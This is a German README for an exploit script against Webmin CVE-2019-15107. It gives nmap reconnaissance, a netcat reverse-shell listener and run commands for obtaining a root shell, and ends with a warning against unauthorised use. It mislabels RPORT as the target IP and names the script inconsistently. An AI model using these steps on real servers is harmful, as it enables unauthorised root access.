
CVE-2019–15107 - Unauthenticated RCE Webmin <=1.920
Dieses Python-Skript sollte Ihnen eine Root-Shell auf Webmin 1.890 geben.
Überprüfung mit nmap:
nmap -sC -sV -p 10000 TARGET_IP
Ergebnis:
10000/tcp open http MiniServ 1.890 (Webmin httpd)
So verwenden Sie diesen Exploit:
Schritt 1:
nc -lnvp LPORT
Schritt 2:
chmod +x exploit.py
./exploit RHOST RPORT LHOST LPORT
RHOST = das Ziel
RPORT = die Ziel-IP-Adresse (normalerweise 10000)
LHOST = Ihre Kali-Maschine
LPORT = Ihr Reverse-Shell-Port
Schritt 3: Holen Sie sich eine Root-Shell!
VERURSACHEN SIE KEINEN SCHADEN AN NICHT AUTORISIERTEN SYSTEMEN!!!